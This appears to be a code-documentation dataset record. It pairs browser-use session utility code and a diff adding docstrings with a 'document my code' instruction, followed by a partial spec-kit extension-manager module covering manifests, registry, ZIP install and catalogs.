handle = ctypes.windll.kernel32.OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, False, pid)
if handle:
ctypes.windll.kernel32.CloseHandle(handle)
return True
return False
else:
try:
os.kill(pid, 0)
return True
except OSError:
return False
def is_server_running(session: str) -> bool:
pid_path = get_pid_path(session)
if not pid_path.exists():
return False
try:
pid = int(pid_path.read_text().strip())
return _pid_exists(pid)
except (OSError, ValueError):
# Can't read PID file or invalid PID
return False
def try_acquire_server_lock(session: str) -> IO | None:
lock_path = get_lock_path(session)
lock_path.parent.mkdir(parents=True, exist_ok=True)
lock_path.touch(exist_ok=True)
lock_file = open(lock_path, 'r+')
try:
portalocker.lock(lock_file, portalocker.LOCK_EX | portalocker.LOCK_NB)
return lock_file
except portalocker.LockException:
lock_file.close()
return None
def is_session_locked(session: str) -> bool:
lock_path = get_lock_path(session)
if not lock_path.exists():
return False
try:
with open(lock_path, 'r+') as f:
portalocker.lock(f, portalocker.LOCK_EX | portalocker.LOCK_NB)
portalocker.unlock(f)
return False # Lock acquired = no one holding it
except portalocker.LockException:
return True # Lock failed = someone holding it
except OSError:
return False # File access error
def kill_orphaned_server(session: str) -> bool:
pid_path = get_pid_path(session)
if not pid_path.exists():
return False
# Check if session is locked (server alive and holding lock)
if is_session_locked(session):
return False # Not an orphan - server is healthy
# PID exists but no lock - orphan situation
try:
pid = int(pid_path.read_text().strip())
if _pid_exists(pid):
# Kill the orphaned process
if sys.platform == 'win32':
import ctypes
PROCESS_TERMINATE = 1
handle = ctypes.windll.kernel32.OpenProcess(PROCESS_TERMINATE, False, pid)
if handle:
ctypes.windll.kernel32.TerminateProcess(handle, 1)
ctypes.windll.kernel32.CloseHandle(handle)
else:
os.kill(pid, signal.SIGKILL)
return True
except (OSError, ValueError):
pass
# Clean up stale files even if we couldn't kill (process may be gone)
cleanup_session_files(session)
return False
def find_all_sessions() -> list[str]:
sessions = []
tmpdir = Path(tempfile.gettempdir())
for pid_file in tmpdir.glob('browser-use-*.pid'):
# Extract session name from filename: browser-use-{session}.pid
name = pid_file.stem.replace('browser-use-', '', 1)
if is_server_running(name):
sessions.append(name)
return sessions
def cleanup_session_files(session: str) -> None:
sock_path = get_socket_path(session)
pid_path = get_pid_path(session)
lock_path = get_lock_path(session)
meta_path = Path(tempfile.gettempdir()) / f'browser-use-{session}.meta'
# Remove socket file (Unix only)
if not sock_path.startswith('tcp://'):
try:
os.unlink(sock_path)
except OSError:
pass
# Remove PID file
try:
pid_path.unlink()
except OSError:
pass
# Remove lock file
try:
lock_path.unlink()
except OSError:
pass
# Remove metadata file
try:
meta_path.unlink()
except OSError:
pass
def find_chrome_executable() -> str | None:
system = platform.system()
if system == 'Darwin':
# macOS
paths = [
'/Applications/Google Chrome.app/Contents/MacOS/Google Chrome',
'/Applications/Chromium.app/Contents/MacOS/Chromium',
'/Applications/Google Chrome Canary.app/Contents/MacOS/Google Chrome Canary',
]
for path in paths:
if os.path.exists(path):
return path
elif system == 'Linux':
# Linux: try common commands
for cmd in ['google-chrome', 'google-chrome-stable', 'chromium', 'chromium-browser']:
try:
result = subprocess.run(['which', cmd], capture_output=True, text=True)
if result.returncode == 0:
return result.stdout.strip()
except Exception:
pass
elif system == 'Windows':
# Windows: check common paths
paths = [
os.path.expandvars(r'%ProgramFiles%\Google\Chrome\Application\chrome.exe'),
os.path.expandvars(r'%ProgramFiles(x86)%\Google\Chrome\Application\chrome.exe'),
os.path.expandvars(r'%LocalAppData%\Google\Chrome\Application\chrome.exe'),
]
for path in paths:
if os.path.exists(path):
return path
return None
def get_chrome_profile_path(profile: str | None) -> str | None:
if profile is None:
# Use default Chrome profile location
system = platform.system()
if system == 'Darwin':
return str(Path.home() / 'Library' / 'Application Support' / 'Google' / 'Chrome')
elif system == 'Linux':
return str(Path.home() / '.config' / 'google-chrome')
elif system == 'Windows':
return os.path.expandvars(r'%LocalAppData%\Google\Chrome\User Data')
else:
# Return the profile name - Chrome will use it as a subdirectory
# The actual path will be user_data_dir/profile
return profile
return None
def list_chrome_profiles() -> list[dict[str, str]]:
import json
user_data_dir = get_chrome_profile_path(None)
if user_data_dir is None:
return []
local_state_path = Path(user_data_dir) / 'Local State'
if not local_state_path.exists():
return []
try:
with open(local_state_path) as f:
local_state = json.load(f)
info_cache = local_state.get('profile', {}).get('info_cache', {})
profiles = []
for directory, info in info_cache.items():
profiles.append(
{
'directory': directory,
'name': info.get('name', directory),
}
)
return sorted(profiles, key=lambda p: p['directory'])
except (json.JSONDecodeError, KeyError, OSError):
return []
def get_config_dir() -> Path:
if sys.platform == 'win32':
base = Path(os.environ.get('APPDATA', Path.home()))
else:
base = Path(os.environ.get('XDG_CONFIG_HOME', Path.home() / '.config'))
return base / 'browser-use'
def get_config_path() -> Path:
return get_config_dir() / 'config.json' | --- +++ @@ -1,3 +1,4 @@+"""Platform utilities for CLI and server."""
import hashlib
import os
@@ -13,6 +14,11 @@
def get_socket_path(session: str) -> str:
+ """Get socket path for session.
+
+ On Windows, returns a TCP address (tcp://127.0.0.1:PORT).
+ On Unix, returns a Unix socket path.
+ """
if sys.platform == 'win32':
# Windows: use TCP on deterministic port (49152-65535)
# Use 127.0.0.1 explicitly (not localhost) to avoid IPv6 binding issues
@@ -22,18 +28,26 @@
def get_pid_path(session: str) -> Path:
+ """Get PID file path for session."""
return Path(tempfile.gettempdir()) / f'browser-use-{session}.pid'
def get_log_path(session: str) -> Path:
+ """Get log file path for session."""
return Path(tempfile.gettempdir()) / f'browser-use-{session}.log'
def get_lock_path(session: str) -> Path:
+ """Get lock file path for session."""
return Path(tempfile.gettempdir()) / f'browser-use-{session}.lock'
def _pid_exists(pid: int) -> bool:
+ """Check if a process with given PID exists.
+
+ On Windows, uses ctypes to call OpenProcess (os.kill doesn't work reliably).
+ On Unix, uses os.kill(pid, 0) which is the standard approach.
+ """
if sys.platform == 'win32':
import ctypes
@@ -52,6 +66,7 @@
def is_server_running(session: str) -> bool:
+ """Check if server is running for session."""
pid_path = get_pid_path(session)
if not pid_path.exists():
return False
@@ -64,6 +79,12 @@
def try_acquire_server_lock(session: str) -> IO | None:
+ """Try to acquire the server lock non-blocking.
+
+ Returns:
+ Lock file handle if acquired (caller must keep in scope to maintain lock),
+ None if lock is already held by another process.
+ """
lock_path = get_lock_path(session)
lock_path.parent.mkdir(parents=True, exist_ok=True)
lock_path.touch(exist_ok=True)
@@ -78,6 +99,7 @@
def is_session_locked(session: str) -> bool:
+ """Check if session has an active lock (server is holding it)."""
lock_path = get_lock_path(session)
if not lock_path.exists():
return False
@@ -94,6 +116,15 @@
def kill_orphaned_server(session: str) -> bool:
+ """Kill an orphaned server (has PID file but no lock).
+
+ An orphaned server is one where the process is running but it doesn't
+ hold the session lock (e.g., because a newer server took over the lock
+ file but didn't kill the old process).
+
+ Returns:
+ True if an orphan was found and killed.
+ """
pid_path = get_pid_path(session)
if not pid_path.exists():
return False
@@ -127,6 +158,7 @@
def find_all_sessions() -> list[str]:
+ """Find all running browser-use sessions by scanning PID files."""
sessions = []
tmpdir = Path(tempfile.gettempdir())
for pid_file in tmpdir.glob('browser-use-*.pid'):
@@ -138,6 +170,7 @@
def cleanup_session_files(session: str) -> None:
+ """Remove session socket, PID, lock, and metadata files."""
sock_path = get_socket_path(session)
pid_path = get_pid_path(session)
lock_path = get_lock_path(session)
@@ -170,6 +203,7 @@
def find_chrome_executable() -> str | None:
+ """Find Chrome/Chromium executable on the system."""
system = platform.system()
if system == 'Darwin':
@@ -208,6 +242,10 @@
def get_chrome_profile_path(profile: str | None) -> str | None:
+ """Get Chrome user data directory for a profile.
+
+ If profile is None, returns the default Chrome user data directory.
+ """
if profile is None:
# Use default Chrome profile location
system = platform.system()
@@ -226,6 +264,12 @@
def list_chrome_profiles() -> list[dict[str, str]]:
+ """List available Chrome profiles with their names.
+
+ Returns:
+ List of dicts with 'directory' and 'name' keys, ex:
+ [{'directory': 'Default', 'name': 'Person 1'}, {'directory': 'Profile 1', 'name': 'Work'}]
+ """
import json
user_data_dir = get_chrome_profile_path(None)
@@ -255,6 +299,7 @@
def get_config_dir() -> Path:
+ """Get browser-use config directory."""
if sys.platform == 'win32':
base = Path(os.environ.get('APPDATA', Path.home()))
else:
@@ -263,4 +308,5 @@
def get_config_path() -> Path:
- return get_config_dir() / 'config.json'+ """Get browser-use config file path."""
+ return get_config_dir() / 'config.json'
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/skill_cli/utils.py |
Document my Python code with docstrings |
import json
import hashlib
import os
import tempfile
import zipfile
import shutil
import copy
from dataclasses import dataclass
from pathlib import Path
from typing import Optional, Dict, List, Any, Callable, Set
from datetime import datetime, timezone
import re
import pathspec
import yaml
from packaging import version as pkg_version
from packaging.specifiers import SpecifierSet, InvalidSpecifier
class ExtensionError(Exception):
pass
class ValidationError(ExtensionError):
pass
class CompatibilityError(ExtensionError):
pass
def normalize_priority(value: Any, default: int = 10) -> int:
try:
priority = int(value)
except (TypeError, ValueError):
return default
return priority if priority >= 1 else default
@dataclass
class CatalogEntry:
url: str
name: str
priority: int
install_allowed: bool
description: str = ""
class ExtensionManifest:
SCHEMA_VERSION = "1.0"
REQUIRED_FIELDS = ["schema_version", "extension", "requires", "provides"]
def __init__(self, manifest_path: Path):
self.path = manifest_path
self.data = self._load_yaml(manifest_path)
self._validate()
def _load_yaml(self, path: Path) -> dict:
try:
with open(path, 'r') as f:
return yaml.safe_load(f) or {}
except yaml.YAMLError as e:
raise ValidationError(f"Invalid YAML in {path}: {e}")
except FileNotFoundError:
raise ValidationError(f"Manifest not found: {path}")
def _validate(self):
# Check required top-level fields
for field in self.REQUIRED_FIELDS:
if field not in self.data:
raise ValidationError(f"Missing required field: {field}")
# Validate schema version
if self.data["schema_version"] != self.SCHEMA_VERSION:
raise ValidationError(
f"Unsupported schema version: {self.data['schema_version']} "
f"(expected {self.SCHEMA_VERSION})"
)
# Validate extension metadata
ext = self.data["extension"]
for field in ["id", "name", "version", "description"]:
if field not in ext:
raise ValidationError(f"Missing extension.{field}")
# Validate extension ID format
if not re.match(r'^[a-z0-9-]+$', ext["id"]):
raise ValidationError(
f"Invalid extension ID '{ext['id']}': "
"must be lowercase alphanumeric with hyphens only"
)
# Validate semantic version
try:
pkg_version.Version(ext["version"])
except pkg_version.InvalidVersion:
raise ValidationError(f"Invalid version: {ext['version']}")
# Validate requires section
requires = self.data["requires"]
if "speckit_version" not in requires:
raise ValidationError("Missing requires.speckit_version")
# Validate provides section
provides = self.data["provides"]
if "commands" not in provides or not provides["commands"]:
raise ValidationError("Extension must provide at least one command")
# Validate commands
for cmd in provides["commands"]:
if "name" not in cmd or "file" not in cmd:
raise ValidationError("Command missing 'name' or 'file'")
# Validate command name format
if not re.match(r'^speckit\.[a-z0-9-]+\.[a-z0-9-]+$', cmd["name"]):
raise ValidationError(
f"Invalid command name '{cmd['name']}': "
"must follow pattern 'speckit.{extension}.{command}'"
)
@property
def id(self) -> str:
return self.data["extension"]["id"]
@property
def name(self) -> str:
return self.data["extension"]["name"]
@property
def version(self) -> str:
return self.data["extension"]["version"]
@property
def description(self) -> str:
return self.data["extension"]["description"]
@property
def requires_speckit_version(self) -> str:
return self.data["requires"]["speckit_version"]
@property
def commands(self) -> List[Dict[str, Any]]:
return self.data["provides"]["commands"]
@property
def hooks(self) -> Dict[str, Any]:
return self.data.get("hooks", {})
def get_hash(self) -> str:
with open(self.path, 'rb') as f:
return f"sha256:{hashlib.sha256(f.read()).hexdigest()}"
class ExtensionRegistry:
REGISTRY_FILE = ".registry"
SCHEMA_VERSION = "1.0"
def __init__(self, extensions_dir: Path):
self.extensions_dir = extensions_dir
self.registry_path = extensions_dir / self.REGISTRY_FILE
self.data = self._load()
def _load(self) -> dict:
if not self.registry_path.exists():
return {
"schema_version": self.SCHEMA_VERSION,
"extensions": {}
}
try:
with open(self.registry_path, 'r') as f:
return json.load(f)
except (json.JSONDecodeError, FileNotFoundError):
# Corrupted or missing registry, start fresh
return {
"schema_version": self.SCHEMA_VERSION,
"extensions": {}
}
def _save(self):
self.extensions_dir.mkdir(parents=True, exist_ok=True)
with open(self.registry_path, 'w') as f:
json.dump(self.data, f, indent=2)
def add(self, extension_id: str, metadata: dict):
self.data["extensions"][extension_id] = {
**metadata,
"installed_at": datetime.now(timezone.utc).isoformat()
}
self._save()
def update(self, extension_id: str, metadata: dict):
if extension_id not in self.data["extensions"]:
raise KeyError(f"Extension '{extension_id}' is not installed")
# Merge new metadata with existing, preserving original installed_at
existing = self.data["extensions"][extension_id]
# Handle corrupted registry entries (e.g., string/list instead of dict)
if not isinstance(existing, dict):
existing = {}
# Merge: existing fields preserved, new fields override
merged = {**existing, **metadata}
# Always preserve original installed_at based on key existence, not truthiness,
# to handle cases where the field exists but may be falsy (legacy/corruption)
if "installed_at" in existing:
merged["installed_at"] = existing["installed_at"]
else:
# If not present in existing, explicitly remove from merged if caller provided it
merged.pop("installed_at", None)
self.data["extensions"][extension_id] = merged
self._save()
def restore(self, extension_id: str, metadata: dict):
self.data["extensions"][extension_id] = dict(metadata)
self._save()
def remove(self, extension_id: str):
if extension_id in self.data["extensions"]:
del self.data["extensions"][extension_id]
self._save()
def get(self, extension_id: str) -> Optional[dict]:
entry = self.data["extensions"].get(extension_id)
return copy.deepcopy(entry) if entry is not None else None
def list(self) -> Dict[str, dict]:
return copy.deepcopy(self.data["extensions"])
def is_installed(self, extension_id: str) -> bool:
return extension_id in self.data["extensions"]
def list_by_priority(self) -> List[tuple]:
extensions = self.data.get("extensions", {}) or {}
if not isinstance(extensions, dict):
extensions = {}
sortable_extensions = []
for ext_id, meta in extensions.items():
if not isinstance(meta, dict):
continue
metadata_copy = copy.deepcopy(meta)
metadata_copy["priority"] = normalize_priority(metadata_copy.get("priority", 10))
sortable_extensions.append((ext_id, metadata_copy))
return sorted(
sortable_extensions,
key=lambda item: (item[1]["priority"], item[0]),
)
class ExtensionManager:
def __init__(self, project_root: Path):
self.project_root = project_root
self.extensions_dir = project_root / ".specify" / "extensions"
self.registry = ExtensionRegistry(self.extensions_dir)
@staticmethod
def _load_extensionignore(source_dir: Path) -> Optional[Callable[[str, List[str]], Set[str]]]:
ignore_file = source_dir / ".extensionignore"
if not ignore_file.exists():
return None
lines: List[str] = ignore_file.read_text().splitlines()
# Normalise backslashes in patterns so Windows-authored files work
normalised: List[str] = []
for line in lines:
stripped = line.strip()
if stripped and not stripped.startswith("#"):
normalised.append(stripped.replace("\\", "/"))
else:
# Preserve blanks/comments so pathspec line numbers stay stable
normalised.append(line)
# Always ignore the .extensionignore file itself
normalised.append(".extensionignore")
spec = pathspec.GitIgnoreSpec.from_lines(normalised)
def _ignore(directory: str, entries: List[str]) -> Set[str]:
ignored: Set[str] = set()
rel_dir = Path(directory).relative_to(source_dir)
for entry in entries:
rel_path = str(rel_dir / entry) if str(rel_dir) != "." else entry
# Normalise to forward slashes for consistent matching
rel_path_fwd = rel_path.replace("\\", "/")
entry_full = Path(directory) / entry
if entry_full.is_dir():
# Append '/' so directory-only patterns (e.g. tests/) match
if spec.match_file(rel_path_fwd + "/"):
ignored.add(entry)
else:
if spec.match_file(rel_path_fwd):
ignored.add(entry)
return ignored
return _ignore
def check_compatibility(
self,
manifest: ExtensionManifest,
speckit_version: str
) -> bool:
required = manifest.requires_speckit_version
current = pkg_version.Version(speckit_version)
# Parse version specifier (e.g., ">=0.1.0,<2.0.0")
try:
specifier = SpecifierSet(required)
if current not in specifier:
raise CompatibilityError(
f"Extension requires spec-kit {required}, "
f"but {speckit_version} is installed.\n"
f"Upgrade spec-kit with: uv tool install specify-cli --force"
)
except InvalidSpecifier:
raise CompatibilityError(f"Invalid version specifier: {required}")
return True
def install_from_directory(
self,
source_dir: Path,
speckit_version: str,
register_commands: bool = True,
priority: int = 10,
) -> ExtensionManifest:
# Validate priority
if priority < 1:
raise ValidationError("Priority must be a positive integer (1 or higher)")
# Load and validate manifest
manifest_path = source_dir / "extension.yml"
manifest = ExtensionManifest(manifest_path)
# Check compatibility
self.check_compatibility(manifest, speckit_version)
# Check if already installed
if self.registry.is_installed(manifest.id):
raise ExtensionError(
f"Extension '{manifest.id}' is already installed. "
f"Use 'specify extension remove {manifest.id}' first."
)
# Install extension
dest_dir = self.extensions_dir / manifest.id
if dest_dir.exists():
shutil.rmtree(dest_dir)
ignore_fn = self._load_extensionignore(source_dir)
shutil.copytree(source_dir, dest_dir, ignore=ignore_fn)
# Register commands with AI agents
registered_commands = {}
if register_commands:
registrar = CommandRegistrar()
# Register for all detected agents
registered_commands = registrar.register_commands_for_all_agents(
manifest, dest_dir, self.project_root
)
# Register hooks
hook_executor = HookExecutor(self.project_root)
hook_executor.register_hooks(manifest)
# Update registry
self.registry.add(manifest.id, {
"version": manifest.version,
"source": "local",
"manifest_hash": manifest.get_hash(),
"enabled": True,
"priority": priority,
"registered_commands": registered_commands
})
return manifest
def install_from_zip(
self,
zip_path: Path,
speckit_version: str,
priority: int = 10,
) -> ExtensionManifest:
# Validate priority early
if priority < 1:
raise ValidationError("Priority must be a positive integer (1 or higher)")
with tempfile.TemporaryDirectory() as tmpdir:
temp_path = Path(tmpdir)
# Extract ZIP safely (prevent Zip Slip attack)
with zipfile.ZipFile(zip_path, 'r') as zf:
# Validate all paths first before extracting anything
temp_path_resolved = temp_path.resolve()
for member in zf.namelist():
member_path = (temp_path / member).resolve()
# Use is_relative_to for safe path containment check
try:
member_path.relative_to(temp_path_resolved)
except ValueError:
raise ValidationError(
f"Unsafe path in ZIP archive: {member} (potential path traversal)"
)
# Only extract after all paths are validated
zf.extractall(temp_path)
# Find extension directory (may be nested)
extension_dir = temp_path
manifest_path = extension_dir / "extension.yml"
# Check if manifest is in a subdirectory
if not manifest_path.exists():
subdirs = [d for d in temp_path.iterdir() if d.is_dir()]
if len(subdirs) == 1:
extension_dir = subdirs[0]
manifest_path = extension_dir / "extension.yml"
if not manifest_path.exists():
raise ValidationError("No extension.yml found in ZIP file")
# Install from extracted directory
return self.install_from_directory(extension_dir, speckit_version, priority=priority)
def remove(self, extension_id: str, keep_config: bool = False) -> bool:
if not self.registry.is_installed(extension_id):
return False
# Get registered commands before removal
metadata = self.registry.get(extension_id)
registered_commands = metadata.get("registered_commands", {})
extension_dir = self.extensions_dir / extension_id
# Unregister commands from all AI agents
if registered_commands:
registrar = CommandRegistrar()
registrar.unregister_commands(registered_commands, self.project_root)
if keep_config:
# Preserve config files, only remove non-config files
if extension_dir.exists():
for child in extension_dir.iterdir():
# Keep top-level *-config.yml and *-config.local.yml files
if child.is_file() and (
child.name.endswith("-config.yml") or
child.name.endswith("-config.local.yml")
):
continue
if child.is_dir():
shutil.rmtree(child)
else:
child.unlink()
else:
# Backup config files before deleting
if extension_dir.exists():
# Use subdirectory per extension to avoid name accumulation
# (e.g., jira-jira-config.yml on repeated remove/install cycles)
backup_dir = self.extensions_dir / ".backup" / extension_id
backup_dir.mkdir(parents=True, exist_ok=True)
# Backup both primary and local override config files
config_files = list(extension_dir.glob("*-config.yml")) + list(
extension_dir.glob("*-config.local.yml")
)
for config_file in config_files:
backup_path = backup_dir / config_file.name
shutil.copy2(config_file, backup_path)
# Remove extension directory
if extension_dir.exists():
shutil.rmtree(extension_dir)
# Unregister hooks
hook_executor = HookExecutor(self.project_root)
hook_executor.unregister_hooks(extension_id)
# Update registry
self.registry.remove(extension_id)
return True
def list_installed(self) -> List[Dict[str, Any]]:
result = []
for ext_id, metadata in self.registry.list().items():
# Ensure metadata is a dictionary to avoid AttributeError when using .get()
if not isinstance(metadata, dict):
metadata = {}
ext_dir = self.extensions_dir / ext_id
manifest_path = ext_dir / "extension.yml"
try:
manifest = ExtensionManifest(manifest_path)
result.append({
"id": ext_id,
"name": manifest.name,
"version": metadata.get("version", "unknown"),
"description": manifest.description,
"enabled": metadata.get("enabled", True),
"priority": normalize_priority(metadata.get("priority")),
"installed_at": metadata.get("installed_at"),
"command_count": len(manifest.commands),
"hook_count": len(manifest.hooks)
})
except ValidationError:
# Corrupted extension
result.append({
"id": ext_id,
"name": ext_id,
"version": metadata.get("version", "unknown"),
"description": "⚠️ Corrupted extension",
"enabled": False,
"priority": normalize_priority(metadata.get("priority")),
"installed_at": metadata.get("installed_at"),
"command_count": 0,
"hook_count": 0
})
return result
def get_extension(self, extension_id: str) -> Optional[ExtensionManifest]:
if not self.registry.is_installed(extension_id):
return None
ext_dir = self.extensions_dir / extension_id
manifest_path = ext_dir / "extension.yml"
try:
return ExtensionManifest(manifest_path)
except ValidationError:
return None
def version_satisfies(current: str, required: str) -> bool:
try:
current_ver = pkg_version.Version(current)
specifier = SpecifierSet(required)
return current_ver in specifier
except (pkg_version.InvalidVersion, InvalidSpecifier):
return False
class CommandRegistrar:
# Re-export AGENT_CONFIGS at class level for direct attribute access
from .agents import CommandRegistrar as _AgentRegistrar
AGENT_CONFIGS = _AgentRegistrar.AGENT_CONFIGS
def __init__(self):
from .agents import CommandRegistrar as _Registrar
self._registrar = _Registrar()
# Delegate static/utility methods
@staticmethod
def parse_frontmatter(content: str) -> tuple[dict, str]:
from .agents import CommandRegistrar as _Registrar
return _Registrar.parse_frontmatter(content)
@staticmethod
def render_frontmatter(fm: dict) -> str:
from .agents import CommandRegistrar as _Registrar
return _Registrar.render_frontmatter(fm)
@staticmethod
def _write_copilot_prompt(project_root, cmd_name: str) -> None:
from .agents import CommandRegistrar as _Registrar
_Registrar.write_copilot_prompt(project_root, cmd_name)
def _render_markdown_command(self, frontmatter, body, ext_id):
# Preserve extension-specific comment format for backward compatibility
context_note = f"\n<!-- Extension: {ext_id} -->\n<!-- Config: .specify/extensions/{ext_id}/ -->\n"
return self._registrar.render_frontmatter(frontmatter) + "\n" + context_note + body
def _render_toml_command(self, frontmatter, body, ext_id):
# Preserve extension-specific context comments for backward compatibility
base = self._registrar.render_toml_command(frontmatter, body, ext_id)
context_lines = f"# Extension: {ext_id}\n# Config: .specify/extensions/{ext_id}/\n"
return base.rstrip("\n") + "\n" + context_lines
def register_commands_for_agent(
self,
agent_name: str,
manifest: ExtensionManifest,
extension_dir: Path,
project_root: Path
) -> List[str]:
if agent_name not in self.AGENT_CONFIGS:
raise ExtensionError(f"Unsupported agent: {agent_name}")
context_note = f"\n<!-- Extension: {manifest.id} -->\n<!-- Config: .specify/extensions/{manifest.id}/ -->\n"
return self._registrar.register_commands(
agent_name, manifest.commands, manifest.id, extension_dir, project_root,
context_note=context_note
)
def register_commands_for_all_agents(
self,
manifest: ExtensionManifest,
extension_dir: Path,
project_root: Path
) -> Dict[str, List[str]]:
context_note = f"\n<!-- Extension: {manifest.id} -->\n<!-- Config: .specify/extensions/{manifest.id}/ -->\n"
return self._registrar.register_commands_for_all_agents(
manifest.commands, manifest.id, extension_dir, project_root,
context_note=context_note
)
def unregister_commands(
self,
registered_commands: Dict[str, List[str]],
project_root: Path
) -> None:
self._registrar.unregister_commands(registered_commands, project_root)
def register_commands_for_claude(
self,
manifest: ExtensionManifest,
extension_dir: Path,
project_root: Path
) -> List[str]:
return self.register_commands_for_agent("claude", manifest, extension_dir, project_root)
class ExtensionCatalog:
DEFAULT_CATALOG_URL = "https://raw.githubusercontent.com/github/spec-kit/main/extensions/catalog.json"
COMMUNITY_CATALOG_URL = "https://raw.githubusercontent.com/github/spec-kit/main/extensions/catalog.community.json"
CACHE_DURATION = 3600 # 1 hour in seconds
def __init__(self, project_root: Path):
self.project_root = project_root
self.extensions_dir = project_root / ".specify" / "extensions"
self.cache_dir = self.extensions_dir / ".cache"
self.cache_file = self.cache_dir / "catalog.json"
self.cache_metadata_file = self.cache_dir / "catalog-metadata.json"
def _validate_catalog_url(self, url: str) -> None:
from urllib.parse import urlparse
parsed = urlparse(url)
is_localhost = parsed.hostname in ("localhost", "127.0.0.1", "::1")
if parsed.scheme != "https" and not (parsed.scheme == "http" and is_localhost):
raise ValidationError(
f"Catalog URL must use HTTPS (got {parsed.scheme}://). "
"HTTP is only allowed for localhost."
)
if not parsed.netloc:
raise ValidationError("Catalog URL must be a valid URL with a host.")
def _load_catalog_config(self, config_path: Path) -> Optional[List[CatalogEntry]]:
if not config_path.exists():
return None
try:
data = yaml.safe_load(config_path.read_text()) or {}
except (yaml.YAMLError, OSError) as e:
raise ValidationError(
f"Failed to read catalog config {config_path}: {e}"
)
catalogs_data = data.get("catalogs", [])
if not catalogs_data:
# File exists but has no catalogs key or empty list - fail closed
raise ValidationError(
f"Catalog config {config_path} exists but contains no 'catalogs' entries. "
f"Remove the file to use built-in defaults, or add valid catalog entries."
)
if not isinstance(catalogs_data, list):
raise ValidationError(
f"Invalid catalog config: 'catalogs' must be a list, got {type(catalogs_data).__name__}"
)
entries: List[CatalogEntry] = []
skipped_entries: List[int] = []
for idx, item in enumerate(catalogs_data):
if not isinstance(item, dict):
raise ValidationError(
f"Invalid catalog entry at index {idx}: expected a mapping, got {type(item).__name__}"
)
url = str(item.get("url", "")).strip()
if not url:
skipped_entries.append(idx)
continue
self._validate_catalog_url(url)
try:
priority = int(item.get("priority", idx + 1))
except (TypeError, ValueError):
raise ValidationError(
f"Invalid priority for catalog '{item.get('name', idx + 1)}': "
f"expected integer, got {item.get('priority')!r}"
)
raw_install = item.get("install_allowed", False)
if isinstance(raw_install, str):
install_allowed = raw_install.strip().lower() in ("true", "yes", "1")
else:
install_allowed = bool(raw_install)
entries.append(CatalogEntry(
url=url,
name=str(item.get("name", f"catalog-{idx + 1}")),
priority=priority,
install_allowed=install_allowed,
description=str(item.get("description", "")),
))
entries.sort(key=lambda e: e.priority)
if not entries:
# All entries were invalid (missing URLs) - fail closed for security
raise ValidationError(
f"Catalog config {config_path} contains {len(catalogs_data)} entries but none have valid URLs "
f"(entries at indices {skipped_entries} were skipped). "
f"Each catalog entry must have a 'url' field."
)
return entries
    def get_active_catalogs(self) -> List[CatalogEntry]:
        """Resolve the active catalog stack, highest precedence first.

        Resolution order (the first source that applies wins outright):
          1. SPECKIT_CATALOG_URL env var — replaces the entire stack with a
             single installable "custom" catalog (backward compat). A
             non-default URL prints a trust warning to stderr once per
             instance (tracked via _non_default_catalog_warning_shown).
          2. Project-level .specify/extension-catalogs.yml
          3. User-level ~/.specify/extension-catalogs.yml
          4. Built-in defaults: official catalog (installable) plus the
             community catalog (discovery only, install_allowed=False).

        Returns:
            Ordered list of CatalogEntry objects.

        Raises:
            ValidationError: If the env var URL fails validation, or a
                config file exists but is invalid or has no valid entries
                (the config loader fails closed rather than falling back).
        """
        import sys
        # 1. SPECKIT_CATALOG_URL env var replaces all defaults for backward compat
        if env_value := os.environ.get("SPECKIT_CATALOG_URL"):
            catalog_url = env_value.strip()
            self._validate_catalog_url(catalog_url)
            if catalog_url != self.DEFAULT_CATALOG_URL:
                if not getattr(self, "_non_default_catalog_warning_shown", False):
                    print(
                        "Warning: Using non-default extension catalog. "
                        "Only use catalogs from sources you trust.",
                        file=sys.stderr,
                    )
                    self._non_default_catalog_warning_shown = True
            return [CatalogEntry(url=catalog_url, name="custom", priority=1, install_allowed=True, description="Custom catalog via SPECKIT_CATALOG_URL")]
        # 2. Project-level config overrides all defaults
        project_config_path = self.project_root / ".specify" / "extension-catalogs.yml"
        catalogs = self._load_catalog_config(project_config_path)
        if catalogs is not None:
            return catalogs
        # 3. User-level config
        user_config_path = Path.home() / ".specify" / "extension-catalogs.yml"
        catalogs = self._load_catalog_config(user_config_path)
        if catalogs is not None:
            return catalogs
        # 4. Built-in default stack
        return [
            CatalogEntry(url=self.DEFAULT_CATALOG_URL, name="default", priority=1, install_allowed=True, description="Built-in catalog of installable extensions"),
            CatalogEntry(url=self.COMMUNITY_CATALOG_URL, name="community", priority=2, install_allowed=False, description="Community-contributed extensions (discovery only)"),
        ]
def get_catalog_url(self) -> str:
active = self.get_active_catalogs()
return active[0].url if active else self.DEFAULT_CATALOG_URL
    def _fetch_single_catalog(self, entry: CatalogEntry, force_refresh: bool = False) -> Dict[str, Any]:
        """Fetch one catalog's JSON payload, using its on-disk cache when fresh.

        Edge cases:
          - The default catalog URL reuses the legacy cache file paths
            (cache_file / cache_metadata_file) so pre-existing caches keep
            working; any other URL gets hash-derived per-URL cache files.
          - force_refresh skips cache validation, but a successful network
            fetch still rewrites the cache.
          - Corrupt or incomplete cache metadata is treated as a cache miss;
            a naive cached_at timestamp is interpreted as UTC; a corrupt
            cached payload falls through to a network fetch instead of
            raising.

        Args:
            entry: Catalog to fetch
            force_refresh: If True, bypass the cache-validity check

        Returns:
            Parsed catalog dict (contains 'schema_version' and 'extensions')

        Raises:
            ExtensionError: On network failure, invalid JSON, or a payload
                missing the required top-level keys.
        """
        import urllib.request
        import urllib.error
        # Determine cache file paths (backward compat for default catalog)
        if entry.url == self.DEFAULT_CATALOG_URL:
            cache_file = self.cache_file
            cache_meta_file = self.cache_metadata_file
            is_valid = not force_refresh and self.is_cache_valid()
        else:
            url_hash = hashlib.sha256(entry.url.encode()).hexdigest()[:16]
            cache_file = self.cache_dir / f"catalog-{url_hash}.json"
            cache_meta_file = self.cache_dir / f"catalog-{url_hash}-metadata.json"
            is_valid = False
            if not force_refresh and cache_file.exists() and cache_meta_file.exists():
                try:
                    metadata = json.loads(cache_meta_file.read_text())
                    cached_at = datetime.fromisoformat(metadata.get("cached_at", ""))
                    if cached_at.tzinfo is None:
                        cached_at = cached_at.replace(tzinfo=timezone.utc)
                    age = (datetime.now(timezone.utc) - cached_at).total_seconds()
                    is_valid = age < self.CACHE_DURATION
                except (json.JSONDecodeError, ValueError, KeyError, TypeError):
                    # If metadata is invalid or missing expected fields, treat cache as invalid
                    pass
        # Use cache if valid
        if is_valid:
            try:
                return json.loads(cache_file.read_text())
            except json.JSONDecodeError:
                pass
        # Fetch from network
        try:
